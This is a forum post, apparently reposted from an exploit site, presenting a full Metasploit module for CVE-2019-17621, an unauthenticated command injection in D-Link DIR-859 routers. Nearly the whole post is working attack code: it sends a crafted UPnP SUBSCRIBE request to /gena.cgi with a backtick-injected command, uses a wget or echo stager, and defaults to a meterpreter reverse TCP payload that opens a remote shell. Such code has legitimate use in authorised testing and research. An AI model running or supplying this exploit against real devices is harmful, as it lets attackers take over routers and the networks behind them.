Jump to content
Fi8sVrs

D-Link DIR-859 Unauthenticated Remote Command Execution Exploit

By Fi8sVrs, in Exploituri

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted

D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP interface. The vulnerability exists in /gena.cgi (function genacgi_main() in /htdocs/cgibin), which is accessible without credentials. 

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
      'Description' => %q{
        D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
        /htdocs/cgibin), which is accessible without credentials.
      },
      'Author'      =>
        [
          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
          'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2019-17621' ],
          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
        ],
      'DisclosureDate' => 'Dec 24 2019',
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'        => ARCH_MIPSBE,
      'DefaultOptions' =>
        {
            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
            'CMDSTAGER::FLAVOR' => 'wget',
            'RPORT' => '49152'
        },
      'Targets'        =>
        [
          [ 'Automatic',  { } ],
        ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget'  => 0,
      ))
 
  end
 
  def execute_command(cmd, opts)
    callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s +
      ":" + Rex::Text.rand_text_hex(4).to_i(16).to_s +
      "/" + Rex::Text.rand_text_alpha(3..12)
    begin
      send_request_raw({
        'uri'  => "/gena.cgi?service=`#{cmd}`",
        'method' =>  'SUBSCRIBE',
        'headers' =>
        {
                'Callback' => "<#{callback_uri}>",
                'NT' => 'upnp:event',
                'Timeout' => 'Second-1800',
        },
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end
 
  def exploit
    execute_cmdstager(linemax: 500)
  end
end
 
#  0day.today [2020-01-24]  #

Source: 0day.today

  • Upvote 2

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...